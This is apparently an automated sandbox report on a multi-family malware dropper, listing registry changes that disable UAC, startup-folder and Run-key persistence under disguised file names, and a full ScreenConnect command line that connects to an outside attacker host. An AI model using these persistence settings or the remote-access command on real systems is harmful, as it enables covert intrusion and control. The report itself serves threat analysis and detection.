Malware Analysis Report

2025-04-13 20:47

Sample ID 250126-abddbsvldt
Target NewTextDocumentmod.exe.zip
SHA256 672ad2d52af206cc63cebe2c801181d3b406aae5891cc57bdaafd5eea3d61fe6
Tags
xred asyncrat nanocore quasar remcos vidar xworm bot default office04 remotehost roblox executor school system program vm-ku backdoor defense_evasion discovery execution keylogger persistence privilege_escalation rat spyware stealer trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

672ad2d52af206cc63cebe2c801181d3b406aae5891cc57bdaafd5eea3d61fe6

Threat Level: Known bad

The file NewTextDocumentmod.exe.zip was found to be: Known bad.

Malicious Activity Summary

NanoCore

Quasar payload

Xworm

Detect Vidar Stealer

Xred

Vidar

Xred family

AsyncRat

UAC bypass

Detect Xworm Payload

Remcos family

Remcos

Vidar family

Xworm family

Asyncrat family

Nanocore family

Quasar family

Quasar RAT

Async RAT payload

Adds policy Run key to start application

Command and Scripting Interpreter: PowerShell

Sets service image path in registry

Disables Task Manager via registry modification

Downloads MZ/PE file

Modifies Windows Firewall

Reads user/profile data of web browsers

Executes dropped EXE

Drops startup file

Loads dropped DLL

Checks computer location settings

Event Triggered Execution: Component Object Model Hijacking

Adds Run key to start application

Checks whether UAC is enabled

Enumerates connected drives

Legitimate hosting services abused for malware hosting/C2

Looks up external IP address via web service

Drops file in System32 directory

Suspicious use of SetThreadContext

Boot or Logon Autostart Execution: Authentication Package

Enumerates processes with tasklist

Drops autorun.inf file

Drops file in Windows directory

Drops file in Program Files directory

System Location Discovery: System Language Discovery

Unsigned PE

Event Triggered Execution: Netsh Helper DLL

Program crash

Enumerates physical storage devices

System Network Configuration Discovery: Internet Connection Discovery

Suspicious use of FindShellTrayWindow

Enumerates system info in registry

Suspicious behavior: AddClipboardFormatListener

Scheduled Task/Job: Scheduled Task

Suspicious use of WriteProcessMemory

Suspicious use of SendNotifyMessage

Runs ping.exe

Suspicious use of AdjustPrivilegeToken

Suspicious behavior: MapViewOfSection

Suspicious behavior: GetForegroundWindowSpam

Uses Task Scheduler COM API

Modifies data under HKEY_USERS

Modifies registry key

Delays execution with timeout.exe

Suspicious behavior: EnumeratesProcesses

Modifies system certificate store

Suspicious use of SetWindowsHookEx

Checks processor information in registry

Uses Volume Shadow Copy service COM API

Modifies registry class

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Reported

2025-01-26 00:01

Signatures

Xred family

xred

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2025-01-26 00:01

Reported

2025-01-26 00:04

Platform

win7-20240903-en

Max time kernel

132s

Max time network

150s

Command Line

"C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe"

Signatures

AsyncRat

rat asyncrat

Asyncrat family

asyncrat

Detect Vidar Stealer

stealer
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Detect Xworm Payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

NanoCore

keylogger trojan stealer spyware nanocore

Nanocore family

nanocore

Quasar RAT

trojan spyware quasar

Quasar family

quasar

Quasar payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Remcos

rat remcos

Remcos family

remcos

UAC bypass

defense_evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\reg.exe N/A

Vidar

stealer vidar

Vidar family

vidar

Xred

backdoor xred

Xred family

xred

Xworm

trojan rat xworm

Xworm family

xworm

Async RAT payload

rat
Description Indicator Process Target
N/A N/A N/A N/A

Adds policy Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\VisualStudioServer = "\"C:\\ProgramData\\Bitdefender\\$77-Bitdefender.exe\"" C:\ProgramData\Bitdefender\$77-Bitdefender.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run \??\c:\program files (x86)\internet explorer\iexplore.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\VisualStudioServer = "\"C:\\ProgramData\\Bitdefender\\$77-Bitdefender.exe\"" \??\c:\program files (x86)\internet explorer\iexplore.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run C:\Users\Admin\AppData\Local\Temp\a\ApiUpdater.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\VisualStudioServer = "\"C:\\ProgramData\\Bitdefender\\$77-Bitdefender.exe\"" C:\Users\Admin\AppData\Local\Temp\a\ApiUpdater.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run C:\ProgramData\Bitdefender\$77-Bitdefender.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Disables Task Manager via registry modification

defense_evasion

Downloads MZ/PE file

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\._cache_Synaptics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\._cache_New Text Document mod.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\._cache_New Text Document mod.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\._cache_New Text Document mod.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\._cache_New Text Document mod.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\._cache_Synaptics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\._cache_Synaptics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\._cache_Synaptics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\._cache_Synaptics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\._cache_Synaptics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\._cache_New Text Document mod.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\._cache_New Text Document mod.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\._cache_New Text Document mod.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\._cache_New Text Document mod.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\._cache_New Text Document mod.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\._cache_New Text Document mod.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\._cache_New Text Document mod.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\._cache_New Text Document mod.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\._cache_New Text Document mod.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\._cache_New Text Document mod.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\._cache_New Text Document mod.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\._cache_Synaptics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\._cache_New Text Document mod.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\._cache_Synaptics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\._cache_Synaptics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\._cache_New Text Document mod.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\._cache_New Text Document mod.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\._cache_Synaptics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\._cache_Synaptics.exe N/A

Sets service image path in registry

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\ScreenConnect Client (0cef7d10d8f459fc)\ImagePath = "\"C:\\Program Files (x86)\\ScreenConnect Client (0cef7d10d8f459fc)\\ScreenConnect.ClientService.exe\" \"?e=Access&y=Guest&h=mail.mindfulinvoice.online&p=8041&s=64840446-9df6-4c65-8411-6e7dc5c317a5&k=BgIAAACkAABSU0ExAAgAAAEAAQBBzfcAyYpoA9s86t45oTU7RBr4d3j4wo7ZWaxqW1gXVfaaoS%2bfd0k%2bPJKuwjzsEUcR0STNhshdEUFtsJUgTCaM2RxVswQODfRB%2fxy8spQ2LWWZZewzTdxJbjosBiXV2QpUCcfCmF5yx2%2fO4iVCF7r%2bUlzDG93NmkPtCrZC9yxqlnxALMX%2bF%2faXCCBkyDmMu3o22AbtP3XzZdSzxk8RbscXClS7evLV%2bxau13F1YFn%2baxZ7QaXuHbPv1tE2Bs26tkj%2fE18oOxpgof0OaK2Jy%2bP9WIy8ymeDPQIfocdTFuAek5wZ3lNpFAcbox7NXzIde9yf0dLrOLPA36Dg%2fHz05hjY&v=AQAAANCMnd8BFdERjHoAwE%2fCl%2bsBAAAA10uxErlupkG5x0OI0LD9GgAAAAACAAAAAAAQZgAAAAEAACAAAACf55AjgxQWYDl6hetgPTS1%2bFUPHtkbCi%2b09QRjV2eDIAAAAAAOgAAAAAIAACAAAADWrAOL4BMPtrjaYIBA2Wq%2fVLw2kgJdEtiyEf3xyH%2bIVqAEAAAv%2b5XbAC%2bay6Hh4phaIEZpucD0pi5LDxu8JYopvUVRPfL6%2fnR%2fKy%2bKwEEJIcRikDK%2fHrZj9cLi4ckXIrAXeqJI4RQUyD2n2RB6IgjFBgXQQAylwyOaNvB2wv74WE2GSGS5RW7TDM1RcEEt2%2fio2rPRS%2fzWXldf0vDAGDCXdKr3JMNGNiFG%2bBAlNz7NOHJjHj0f7XIGC27%2bUwWSdijqtMYkzFlYQI7%2b1vvdlIyQlIrUC9Qw%2fEVGE1am1dL2PKuoQMuL5iKM78a%2fsLiJ0462nAixfTAgWoIT%2fMTjvYyY5YIMqbbL3qgODCgY82SNNoGtjCkjbb54VUfvEjGpm9kCRskkQyATanLYCop2i2OQXFBIj6%2bzE4Ad6vmXrTUphfgY%2bkxPIeZSqZschXkFMnSbgwuzwrYJhVZDSk6pVeIjRXzJCEECZIaG2W6fr0RMgBVTJ%2ba%2b7OOhRaUuwOhhs0tRK8HuUGdvvq4uLyJLyi4c0LlhR4om2sc03BYdlgDrh786fTEaJ34zFKcdPqnZ%2bAZjTMEl1fJm6qL3eDDww42VXJ7E0rWdHj2cs6JNXwJhar5p%2fcc1cp8ZmJK5GdpLnbmhv3cBgNRD5dhip8GrWXxN9TZooIZEc38SI%2fVfW9TsyQbQapdwLc%2bI0dmke8FtFWB4QRwGRgJLNAVytKJqEti36YFuhuAD8EXR4GUHN9BzHi0Nkc6sVxuMX1gA38RlbrP7ZINCwXTBhNHWkyNV6BZEfJWCy6mPBYZN7TkVsMFGpzgRDshRrEhzORcim9m3Fig8%2bwZlR9oJ4pXZ2VXckBm1Og5mpJJa7mzZuO9WieVxfeR3JfBcMbMFhLV21nCzoKVFR%2f2546uQAMZJLbwE7T7yZ150DokywDAsGW0RrXEItUPOx6lLMTT4Id5FtDX9A752412V0%2fAJnsyOsN9VdFQC46wXLCuF0yt4jNPOIjpyC4PN9kfcwHaAyye7%2fL6S%2bgn5YcwaE11vpQOrUBUyAS%2bzti%2bRAu6jyQ9VB%2fDemOyMX0m5xnAyYykOcPj8UBqJCfM2IVKwFgxNXBFKFYeFbTCwV8zxTJgnHnxaKvZWrGrl1yHWi1QGnLI2FG3D%2fOlnA5LpVsWrTfUF4sMVbEk%2f%2fFQwZIUzxDV3d5ngX8YmUiGa6%2blLoUL4HEjpoGqY229U5k5Z2V9ekJ4%2f9kxMr6QoHEyPfztw3idsxZMwVM4G6cvhfYV5ViQIVaMGpB0zcxu66YDC4k%2fGx4TKUAzxWp0rIaB2JNrY1K1wHReQfISyng76Qtr%2bakfTPpppKThcJ1DKcihcrpTQKwhCSSLR3S2GkpCfno2mW%2bBmaYA44dv%2f6y0SAlzpYOsReZYbqPzr6ZZPm8xFjCK5aSbV8S9E5Z6LzGBZ0aDuRRFMShOLu9DZ%2f8uWLu47rMzOZnywOjYNT4sDM8u6%2fOs45xNY5VP4nD9S18%2fOr40HRhWsJS43VmNinW%2fL93DBMr2JrO3jtOW%2by0U8RFgPCW41fOlpXCwUpgfEidsv5s6niKUPnZLUAuD1Sm31AJD7BEhEh2SIY3oqC6A9kBDVcF8ooxWqycRrsOldQ%2ff%2fqWaXuEAAAACKUSN5Kh0v1O4kC4Is4FuSvGAdooFKdhtoY2dmnBaiPQ9XIcF9lo%2bgNGhAqZjFhe62I8sjHJXNnQTKW42xXncf&c=zoom&c=zoom-invite.com&c=&c=&c=&c=&c=&c=\"" C:\Program Files (x86)\ScreenConnect Client (0cef7d10d8f459fc)\ScreenConnect.ClientService.exe N/A

Drops startup file

Description Indicator Process Target
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Corporation.exe C:\Users\Admin\AppData\Local\Temp\server.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Corporation.exe C:\Users\Admin\AppData\Local\Temp\server.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Explower.exe C:\Users\Admin\AppData\Local\Temp\server.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Corporation.exe C:\Users\Admin\AppData\Local\Temp\server.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\d8c4f4669aaf7e763f29c3228e3c660dWindows Update.exe C:\Users\Admin\AppData\Local\Temp\server.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Explower.exe C:\Users\Admin\AppData\Local\Temp\server.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Explower.exe C:\Users\Admin\AppData\Local\Temp\server.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Corporation.exe C:\Users\Admin\AppData\Local\Temp\server.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Corporation.exe C:\Users\Admin\AppData\Local\Temp\server.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Explower.exe C:\Users\Admin\AppData\Local\Temp\server.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\d8c4f4669aaf7e763f29c3228e3c660dWindows Update.exe C:\Users\Admin\AppData\Local\Temp\server.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\T.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Enalib.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\d8c4f4669aaf7e763f29c3228e3c660dWindows Update.exe C:\Users\Admin\AppData\Local\Temp\server.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\d8c4f4669aaf7e763f29c3228e3c660dWindows Update.exe C:\Users\Admin\AppData\Local\Temp\server.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ef9410a92d1077d89c94b9208aa74f96Windows Update.exe C:\Users\Admin\AppData\Roaming\server.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Explower.exe C:\Users\Admin\AppData\Local\Temp\server.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Explower.exe C:\Users\Admin\AppData\Local\Temp\server.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\d8c4f4669aaf7e763f29c3228e3c660dWindows Update.exe C:\Users\Admin\AppData\Local\Temp\server.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\d8c4f4669aaf7e763f29c3228e3c660dWindows Update.exe C:\Users\Admin\AppData\Local\Temp\server.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\d8c4f4669aaf7e763f29c3228e3c660dWindows Update.exe C:\Users\Admin\AppData\Local\Temp\server.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ef9410a92d1077d89c94b9208aa74f96Windows Update.exe C:\Users\Admin\AppData\Roaming\server.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Corporation.exe C:\Users\Admin\AppData\Local\Temp\server.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Explower.exe C:\Users\Admin\AppData\Local\Temp\server.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Explower.exe C:\Users\Admin\AppData\Local\Temp\server.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\d8c4f4669aaf7e763f29c3228e3c660dWindows Update.exe C:\Users\Admin\AppData\Local\Temp\server.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\d8c4f4669aaf7e763f29c3228e3c660dWindows Update.exe C:\Users\Admin\AppData\Local\Temp\server.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Explower.exe C:\Users\Admin\AppData\Local\Temp\server.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Explower.exe C:\Users\Admin\AppData\Local\Temp\server.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\d8c4f4669aaf7e763f29c3228e3c660dWindows Update.exe C:\Users\Admin\AppData\Local\Temp\server.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Corporation.exe C:\Users\Admin\AppData\Local\Temp\server.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Explower.exe C:\Users\Admin\AppData\Local\Temp\server.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HasInfo.vbs C:\Users\Admin\AppData\Local\Temp\a\Update.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Corporation.exe C:\Users\Admin\AppData\Roaming\server.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Network.lnk C:\Users\Admin\AppData\Local\Temp\a\Network.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Network.lnk C:\Users\Admin\AppData\Local\Temp\a\Network.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Corporation.exe C:\Users\Admin\AppData\Local\Temp\server.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\d8c4f4669aaf7e763f29c3228e3c660dWindows Update.exe C:\Users\Admin\AppData\Local\Temp\server.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\T.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Enalib.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Corporation.exe C:\Users\Admin\AppData\Local\Temp\server.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Explower.exe C:\Users\Admin\AppData\Local\Temp\server.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\d8c4f4669aaf7e763f29c3228e3c660dWindows Update.exe C:\Users\Admin\AppData\Local\Temp\server.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Corporation.exe C:\Users\Admin\AppData\Local\Temp\server.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\d8c4f4669aaf7e763f29c3228e3c660dWindows Update.exe C:\Users\Admin\AppData\Local\Temp\server.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Corporation.exe C:\Users\Admin\AppData\Local\Temp\server.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Explower.exe C:\Users\Admin\AppData\Local\Temp\server.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Corporation.exe C:\Users\Admin\AppData\Local\Temp\server.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Explower.exe C:\Users\Admin\AppData\Local\Temp\server.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\d8c4f4669aaf7e763f29c3228e3c660dWindows Update.exe C:\Users\Admin\AppData\Local\Temp\server.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Corporation.exe C:\Users\Admin\AppData\Local\Temp\server.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Explower.exe C:\Users\Admin\AppData\Local\Temp\server.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Corporation.exe C:\Users\Admin\AppData\Roaming\server.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Corporation.exe C:\Users\Admin\AppData\Local\Temp\server.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\d8c4f4669aaf7e763f29c3228e3c660dWindows Update.exe C:\Users\Admin\AppData\Local\Temp\server.exe N/A

Event Triggered Execution: Component Object Model Hijacking

persistence privilege_escalation

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\._cache_New Text Document mod.exe N/A
N/A N/A C:\ProgramData\Synaptics\Synaptics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\._cache_Synaptics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\test.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\Update.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\zoom_invitecode=23884232.zoom.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\634977\Surrey.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\ApiUpdater.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\noyjhoadw.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\windows.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\T.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\Enalib.exe N/A
N/A N/A C:\ProgramData\Bitdefender\$77-Bitdefender.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\access.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\36.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\99999.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\22.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\server.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\system.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\discordupdate.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\Network.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\rea.exe N/A
N/A N/A C:\Windows\system32\dll32\msinfo32.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\MSystem32.exe N/A
N/A N/A C:\Program Files (x86)\ScreenConnect Client (0cef7d10d8f459fc)\ScreenConnect.ClientService.exe N/A
N/A N/A C:\Program Files (x86)\ScreenConnect Client (0cef7d10d8f459fc)\ScreenConnect.WindowsClient.exe N/A
N/A N/A C:\Program Files (x86)\ScreenConnect Client (0cef7d10d8f459fc)\ScreenConnect.WindowsClient.exe N/A
N/A N/A C:\Windows\system32\dll32\msinfo32.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\SharpHound.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\mod.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\Server.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\Client.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\jij.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A
N/A N/A C:\Windows\system32\Windows Shell Interactive.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\333.exe N/A
N/A N/A C:\Windows\system32\dll32\msinfo32.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe N/A
N/A N/A C:\Windows\system32\Windows Shell Interactive.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A
N/A N/A C:\Windows\system32\dll32\msinfo32.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Network.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe N/A
N/A N/A C:\Windows\system32\Windows Shell Interactive.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A
N/A N/A C:\Windows\system32\dll32\msinfo32.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe N/A
N/A N/A C:\Windows\system32\Windows Shell Interactive.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A
N/A N/A C:\Windows\system32\dll32\msinfo32.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A
N/A N/A C:\Windows\system32\Windows Shell Interactive.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe N/A
N/A N/A C:\Windows\system32\dll32\msinfo32.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe N/A

Loads dropped DLL

Description Indicator Process Target
